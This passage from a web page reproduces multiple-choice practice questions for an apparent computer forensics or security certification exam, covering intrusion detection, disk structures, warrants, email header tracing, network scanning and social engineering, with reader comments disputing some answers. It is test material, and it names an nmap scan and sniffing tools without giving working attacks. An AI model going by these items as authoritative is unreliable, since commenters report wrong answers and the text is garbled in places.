drive?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 1</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 2</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 3</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 4</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">73. Which Intrusion Detection System (IDS) usually produces the most false alarms due to the unpredictable</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">behaviors of users and networks?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. network-based IDS systems (NIDS)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. host-based IDS systems (HIDS)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. anomaly detection</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. signature recognition</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">1. val says:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">June 17, 2012 at 8:09 pm</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">this one wrong as well. the answer is in the question, nids, specifically anamoly detection nids will</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">produce the most false positivies to due to challanging traffic patterns and flows</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">2. Ay says:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">July 8, 2012 at 8:11 am</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">I agree with Val on this. NIDS is more susceptible to FP</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">74. Jason is the security administrator of ACMA metal Corporation. One day he notices the company.s Oracle</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">database server has been compromised and the customer information along with financial data has been</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Jason wants to report this crime to the law enforcement agencies immediately. Which organization</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">coordinates computer crimes investigations throughout the United States?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Internet Fraud Complaint Center</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Local or national office of the U.S. Secret Service</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. National Infrastructure Protection Center</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. CERT Coordination Center</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">75. Which of the following should a computer forensics lab used for investigations have?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. isolation</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. restricted access</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. open access</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. an entry log</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">76. Corporate investigations are typically easier than public investigations because:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. the users have standard corporate equipment and software</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. the investigator does not have to get a warrant</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. the investigator has to get a warrant</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. the users can load whatever they want on their machines</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">77. Area density refers to:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. the amount of data per disk</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. the amount of data per partition</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. the amount of data per square inch</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. the amount of data per platter</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">1. j!nx says:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">August 3, 2012 at 1:32 am</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Wrong answer. correct answer is C, the amount of data per square inch.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">78. Sectors in hard disks typically contain how many bytes?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 256</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 512</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 1024</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 2048</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">79. What does the superblock in Linux define?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. filesynames</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. diskgeometr</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. location of the firstinode</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. available space</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">80. Terri works for a security consulting firm that is currently performing a penetration test on First National</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Bank in Tokyo. Terri.s duties include bypassing firewalls and switches to gain access to the network. Terri</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">sends an IP packet to one of the company.s switches with ACK bit and the source address of her machine</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">set. What is Terri trying to accomplish by sending this IP packet?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Trick the switch into thinking it already has a session with Terri.s computer</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Poison the switch.s MAC address table by flooding it with ACK bits</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Crash the switch with aDoS attack since switches cannot send ACK bits</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Enable tunneling feature on the switch</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">81. When obtaining a warrant it is important to:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. particularlydescribe the place to be searched and particularly describe the items to be seized</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. generallydescribe the place to be searched and particularly describe the items to be seized</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. generallydescribe the place to be searched and generally describe the items to be seized</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. particularlydescribe the place to be searched and generally describe the items to be seized</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">82. You are working for a local police department that services a population of 1,000,000 people and you have</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">been given the task of building a computer forensics laB. How many law-enforcement computer</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">investigators should you request to staff the lab?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 8</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 1</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 4</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 2</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">83. From the following spam mail header, identify the host IP that sent this spam?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">From jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001 Received: from</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT) Received: from mydomain.com</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">(pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT) Message-Id:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">>200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">From: ¡°china hotel web¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">To: ¡°Shlam¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Subject: SHANGHAI (HILTON HOTEL) PACKAGE</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0 X-Priority: 3 X-MSMail-</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Priority: Normal</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Reply-To: ¡°china hotel web¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 137.189.96.52</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 8.12.1.0</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 203.218.39.20</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 203.218.39.50</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">84. If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">you conclude?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The system files have been copied by a remote attacker</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The system administrator has created an incremental backup</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The system has been compromised using a t0rnrootkit</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Nothing in particular as these can be operational files</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">85. What binary coding is used most often for e-mail purposes?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. MIME</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Uuencode</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. IMAP</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. SMTP</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">86. If you discover a criminal act while investigating a corporate policy abuse, it becomes a public- sector</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">investigation and should be referred to law enforcement?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. true</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. false</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">87. During the course of an investigation, you locate evidence that may prove the innocence of the suspect of</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">process. Therefore you report this evidence. This type of evidence is known as:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Inculpatory evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. mandatory evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. exculpatory evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Terrible evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">88. What term is used to describe a cryptographic technique for embedding information into something else for</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the sole purpose of hiding that information from the casual observer?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. rootkit</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. key escrow</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. steganography</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Offset</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">89. You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">HTML, DHTML, and other web-based languages and how they have evolved over the years. You navigate</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">to archive. org and view the HTML code of news.com. You then navigate to the current news.com website</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">and copy over the source code. While searching through the code, you come across something abnormal:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">What have you found?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Web bug</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. CGI code</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Trojan.downloader</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Blind bug</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">90. Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">directions from the ISP as well as the wireless router manual. He does not have any encryption set and the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the connection drops and the signal goes away. Eventually the wireless signal shows back up, but drops</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">intermittently. What could be Tyler issue with his home wireless network?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Computers on his wired network</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Satellite television</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 2.4Ghz Cordless phones</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. CB radio</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">91. How many possible sequence number combinations are there in TCP/IP protocol?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 1 billion</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 320 billion</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 4 billion</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 32 million</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">92. In a virtual test environment, Michael is testing the strength and security of BGP using multiple routers to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">mimic the backbone of the Internet. This project will help him write his doctoral thesis on ¡°bringing down</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the Internet¡±. Without sniffing the traffic between the routers, Michael sends millions of RESET packets to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the routers in an attempt to shut one or all of them down. After a few hours, one of the routers finally shuts</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">itself down. What will the other routers communicate between themselves?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The change in the routing fabric to bypass the affected router</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. More RESET packets to the affected router to get it to power back up</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. RESTART packets to the affected router to get it to power back up</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. STOP packets to all other routers warning of where the attack originated</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">93. Your company.s network just finished going through a SAS 70 audit. This audit reported that overall, your</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">network is secure, but there are some areas that needs improvement. The major area was SNMP security.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">The audit company recommended turning off SNMP, but that is not an option since you have so many</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">remote nodes to keep track of. What step could you take to help secure SNMP on your network?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Block all internal MAC address from using SNMP</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Block access to UDP port 171</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Block access to TCP port 171</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Change the default community string names</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">94. After passively scanning the network of Department of Defense (DoD), you switch over to active scanning</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">to identify live hosts on their network. DoD is a lage organization and should respond to any number of</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">responds to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">sweep only produce a few responses?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Only IBM AS/400 will reply to this scan</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Only Windows systems will reply to this scan</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. A switched network will not respond to packets sent to the broadcast address</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Only Unix and Unix-like systems will reply to this scan</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">95. How many bits is Source Port Number in TCP Header packet?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 16</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 32</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 48</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 64</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">96. What does ICMP Type 3/Code 13 mean?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Host Unreachable</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Administratively Blocked</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Port Unreachable</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Protocol Unreachable</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">97. What will the following command accomplish?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">c:\> nmap -v -sS -Po 172.16.28.251 -data_length 66000-packet_trace</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Test ability of a router to handle over-sized packets</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Test the ability of a router to handle under-sized packets</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Test the ability of a WLAN to handle fragmented packets</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Test the ability of a router to handle fragmented packets</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">98. Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">FTP-PUT. Which firewall would be most appropriate for Harold? needs?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Circuit-level proxy firewall</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Packet filtering firewall</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Application-level proxy firewall</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Data link layer firewall</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">99. Julia is a senior security analyst for Berber Consulting group. She is currently working on a contract for a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">small accounting firm in FloridA. They have given her permission to perform social engineering attacks on</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the company to see if their in-house training did any gooD. Julia calls the main number for the accounting</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">firm and talks to the receptionist. Julia says that she is an IT technician from the company.s main office in</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">IowA. She states that she needs the receptionist.s network username and password to troubleshoot a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">problem they are having. Julia says that Bill Hammond, the CEO of the company, reQuested this</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">information. After hearing the name of the CEO, the receptionist gave Julia all the information she asked</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">for. What principal of social engineering did Julia use?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Social Validation</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Scarcity</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Friendship/Liking</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Reciprocation</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">100. As a security analyst you setup a false survey website that will reQuire users to create a username and a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">strong passworD. You send the link to all the employees of the company. What information will you be</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">able to gather?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The IP address of the employees computers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Bank account numbers and the corresponding routing numbers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The employees network usernames and passwords</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The MAC address of theemployees?computers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">101. You are the security analyst working for a private company out of France. Your current assignment is to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">obtain credit card information from a Swiss bank owned by that company. After initial reconnaissance, you</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">discover that the bank security defenses are very strong and would take too long to penetrate. You decide to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">get the information by monitoring the traffic between the bank and one of its subsidiaries in London. After</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">monitoring some of the traffic, you see a lot of FTP packets traveling back and forth. You want to sniff the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">traffic and extract usernames and passwords. What tool could you use to get this information?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Airsnort</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Snort</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Ettercap</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. RaidSniff</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">102. What is a good security method to prevent unauthorized users from ¡°tailgating¡±?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Man trap</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Electronic combination 